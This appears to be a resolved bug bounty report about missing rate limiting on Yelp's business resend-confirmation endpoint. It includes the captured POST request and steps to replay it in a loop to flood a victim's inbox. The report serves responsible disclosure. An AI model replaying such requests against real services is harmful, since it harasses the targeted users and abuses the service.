Loading HuntDB...

No rate limiting for confirmation email lead to email flooding

Medium
Y
Yelp
Submitted None
Reported by muhammaddaffa

Vulnerability Details

Technical details and impact analysis

Violation of Secure Design Principles
### Description: There is no rate limiting implemented in sending the confirmation email. Thus, attacker can use this vulnerability to bomb out the email inbox of the victim. ### Affected URL: ``` https://biz.yelp.com/welcome/resend_confirmation ``` with POST method ### Details: 1. Login to biz.yelp.com 2. Go to https://biz.yelp.com/messaging/xxxxxxxxxxxxxxx/inbox, it should look like this {F683815} 3. Press Re-send email then capture the request, it should like this ``` POST /welcome/resend_confirmation HTTP/1.1 Host: biz.yelp.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://biz.yelp.com/messaging/xxxxxxxxxxxxxxxxxxxxxxxxxxx/inbox Content-Type: application/x-www-form-urlencoded Content-Length: 129 Origin: https://biz.yelp.com Connection: close Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Upgrade-Insecure-Requests: 1 csrftok=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&return_url=%2Fmessaging%2Foj517fznD2Gw2v5CUUIw_Q%2Finbox ``` 4. Send the captured request to Intruder and repeat the request in loop 5. Check the email, your email will be flooded by yelp confirmation email {F683818} ### How to fix: Rate limiting should be implemented ## Impact Email Flooding

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Violation of Secure Design Principles